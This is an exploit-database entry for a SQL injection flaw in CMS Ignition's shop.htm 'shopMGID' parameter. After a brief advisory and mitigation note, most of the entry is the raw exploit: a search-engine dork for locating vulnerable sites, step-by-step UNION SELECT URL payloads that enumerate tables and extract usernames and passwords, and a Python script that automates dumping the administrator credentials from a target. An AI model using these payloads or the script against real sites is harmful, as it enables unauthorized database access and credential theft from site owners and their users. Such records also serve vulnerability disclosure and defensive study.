CMS Ignition SQL Injection

vendor:

CMS Ignition

by:

NEAVORC

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: CMS Ignition

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

CMS Ignition is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'shopMGID' parameter of the 'shop.htm' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. All input data should be validated and filtered before passing it to the SQL query.

Source

Exploit-DB raw data:

|------------------------------------------------|
| neavorc[@]gmail[dot]com                        |
==================================================

[+] SQL Injection Vulnerability
[+] Dorks: allinurl:"shop.htm?shopMGID="
[+] Bug in shop.htm?shopMGID
[+] Exploit: http://www.site.com/shop.htm?shopMGID=XXXX (see below python exploit)
[+] 
==================================================

Step[1]:
Error
http://www.site.com/shop.htm?shopMGID=9999'

Step[2]:
Number of columns
http://www.site.com/shop.htm?shopMGID=9999+order+by+1--

Step[3]:
Output of numbers
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,3,4,5--

Step[4]:
Collect informations
http://www.site.com/shop.htm?shopMGID=-9999+union+select+version(),database(),3,4,5+from+information_schema.columns--

Step[5]:
If version is
5.0.67-community
5.0.32-Debian_7etch8-log
5.0.40-log
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns--

Step[6]:
Increment zero in "limit+0,1--" until you have interesting tables and columns
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns+limit+0,1--

Step[7]:
Get the content
(fiction tables in this example)
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,username,password),4,5+user--

==================================================

[+] Contact:
    - neavorc[at]gmail.com

==================================================
Discovered by NEAVORC
Cheers'n'Oi

==================================================

# Exploit Title:	CMS Ignition SQL Injection
# Date: 		25/08/2010  [DD:MM:JJJJ]
# Author:		NEAVORC
# Software Link: 	http://www.finegrafix.co.za/
#			http://www.finegrafix.co.za/cmsignition.htm
# Dork:			Dorks: allinurl:"shop.htm?shopMGID="	

import urllib ,sys,os 
if len(sys.argv)!=2:
	os.system('cls')
	os.system('clear')
	print "==============================================================================="
	print "==============   CMSignition Exploit  ||| NEAVORC[@]gmail[.]com ==============="
	print "==============================================================================="
	print "== Take the Admin username and the password from the tagrt page              =="
	print "=Usage: ./exploit.py <injection>                                             =="
	print "=Exmpl: ./exploit.py <http://www.site.com/shop.htm?shopMGID=131>  =="
	print "==============================================================================="
	sys.exit(1)
global url,end,injection,i	
url = sys.argv[1]
url = url.replace("=","=-")
end = "+from+adminUsers--"
injection = "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,0x6F7574707574,username,password,0x6861636B6564),22,23,24,25,26,27,28,29,"
os.system('cls')
print "==============================================================================="
print "=================   SQLi   Exploit  ||| NEAVORC[@]gmail[.]com ================="
print "==============================================================================="
print "==                         Exploiting Please wait...                         =="
print "==============================================================================="

if url[:7] != "http://":
	print "Url correction...."
	url = "http://"+url
	print "To : "+url
try:
	i = 30
	while i <=70:
		global full_inj
		injection = injection+str(i)+","
		full_inj = url+injection[:-1]+end
		f = urllib.urlopen(full_inj)
		s = f.read()
		if "output:" in s:
			begin = int(s.find("output"))
			end = int(s.find("hacked"))
			columns = full_inj[-20:-18]
			os.system('cls')
			print "==============================================================================="
			print "=================   SQLi   Exploit  ||| NEAVORC[@]gmail[.]com ================="
			print "==============================================================================="		
			print "=================   Administrator: "+s[begin:end-1]
			print "=================   Columns: "+columns
			print "==============================================================================="
			print "==============             Exploit by NEAVORC[at]gmail.com          ==========="	
		i = i+1	
except(TypeError):
	exit